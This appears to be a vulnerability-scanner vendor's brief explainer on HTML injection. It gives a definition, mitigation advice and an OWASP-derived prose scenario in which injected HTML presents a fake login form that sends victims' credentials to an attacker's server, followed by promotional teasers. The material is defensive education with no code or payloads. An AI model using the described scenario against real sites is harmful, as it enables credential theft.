HTML Injection


This vulnerability occurs when user input is not correctly sanitized and the output is not encoded.

Bussines Impact

A successful injection will allow the attacker to send a malicious HTML page to a victim.


Look for HTML elements in the incoming HTTP stream that contains the user input. And simply removes any HTML-syntax substrings (like tags and links) from any user-supplied text.

More Details

OWASP Attack scenario A possible attack scenario is demonstrated below: Attacker discovers injection vulnerability and decides to use an HTML injection attack Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email The user visits the page due to the page being located within a trusted domain The attacker’s injected HTML is rendered and presented to the user asking for a username and password The user enters a username and password, which are both sent to the attackers server


What is Kayran

Kayran scanner is helping all businesses, both SMBs and enterprises, to test their online assets and products for over 9000 vulnerabilities.Kayran’s mission is to make

Read More »


How to preform SQLI TO RCE? One of the most interesting and important things about any site is the database. So, it’s important to protect

Read More »